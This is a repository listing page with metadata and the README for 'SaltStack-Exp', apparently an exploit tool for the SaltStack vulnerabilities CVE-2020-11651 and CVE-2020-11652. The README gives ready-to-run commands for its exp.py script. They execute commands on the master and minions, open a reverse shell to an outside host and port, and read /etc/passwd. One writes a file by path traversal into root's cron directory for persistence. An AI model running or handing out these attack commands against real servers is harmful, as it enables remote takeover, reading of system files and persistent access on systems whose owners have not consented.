https://github.com/al1ex/cve-2020-11652
CVE-2020-11652 & CVE-2020-11651
https://github.com/al1ex/cve-2020-11652
Last synced: 10 months ago
JSON representation
CVE-2020-11652 & CVE-2020-11651
- Host: GitHub
- URL: https://github.com/al1ex/cve-2020-11652
- Owner: Al1ex
- Created: 2020-12-25T02:58:35.000Z (over 5 years ago)
- Default Branch: main
- Last Pushed: 2020-12-25T02:58:51.000Z (over 5 years ago)
- Last Synced: 2025-04-11T07:47:49.994Z (about 1 year ago)
- Language: Python
- Size: 2.93 KB
- Stars: 6
- Watchers: 1
- Forks: 3
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# SaltStack-Exp
CVE-2020-11651
CVE-2020-11652
#### Exec-Master:
```
python exp.py --exec-choose master --exec-cmd "whoami"
```
#### Exec-Minions:
```
python exp.py --exec-choose minions --exec-cmd "whoami"
```
#### GetShell:
```
python exp.py --shell-LHOST 8.8.8.8 --shell-LPORT 4444
```
#### ReadFile:
```
python exp.py --read /etc/passwd
```
#### UploadFile:
```
python exp.py --upload-src "/test/root" --upload-dest "../../../../../../../../var/spool/cron/crontabs/root"
```
From :https://github.com/bravery9/SaltStack-Exp